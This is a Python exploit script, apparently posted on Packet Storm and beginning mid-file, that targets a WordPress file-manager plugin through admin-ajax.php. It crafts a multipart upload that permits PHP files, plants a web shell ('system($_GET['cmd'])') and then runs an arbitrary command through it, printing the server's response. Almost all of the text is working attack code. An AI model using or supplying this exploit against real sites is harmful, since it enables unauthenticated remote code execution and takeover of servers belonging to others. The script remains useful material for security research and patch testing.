== 0:    print(f"{FAIL} Cannot found fmakey!")except:  print(f"{FAIL} Cannot found fmakey!")print(f'{PROCESS} Exploiting Unauthenticated Remote Code Execution via AJAX!')url = "http://"+IP+"/wp-admin/admin-ajax.php"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryI52DGCOt37rixRS1", "Accept": "*/*"}data = "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hashes[l1_cG5nLWNsaXBhcnQtaGFja2VyLWhhY2tlci5wbmc]\"\r\n\r\nexploit.php\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_shortcode_fma_ui\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"_fmakey\"\r\n\r\n"+fmakey+"\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path\"\r\n\r\n\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"url\"\r\n\r\n\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"w\"\r\n\r\nfalse\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"r\"\r\n\r\ntrue\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide\"\r\n\r\nplugins\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"operations\"\r\n\r\nupload,download\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path_type\"\r\n\r\ninside\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide_path\"\r\n\r\nno\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"enable_trash\"\r\n\r\nno\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_allow\"\r\n\r\ntext/x-php\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_max_size\"\r\n\r\n2G\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"exploit2.php\"\r\nContent-Type: text/x-php\r\n\r\n<?php system($_GET['cmd']);?>\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n\r\n------WebKitFormBoundaryI52DGCOt37rixRS1--\r\n"r = requests.post(url, headers=headers, data=data)print(f"{PROCESS} Sending AJAX request to: {url}")if 'errUploadMime' in r.text:  print(f'{FAIL} Exploit failed!')  sys.exit()elif r.headers['Content-Type'].startswith("text/html"):  print(f'{FAIL} Exploit failed! Try to change _fmakey')  sys.exit(0)else:  print(f'{SUCCESS} Exploit executed with success!')exploited = json.loads(r.text)url = ""print(f'{PROCESS} Getting URL with webshell')for i in exploited["added"]:  url = i['url']print(f"{PROCESS} Executing '{COMMAND}'")r = requests.get(url+'?cmd='+COMMAND)print(f'{SUCCESS} The application returned ({len(r.text)} length):\n'+r.text)

Source

Packet Storm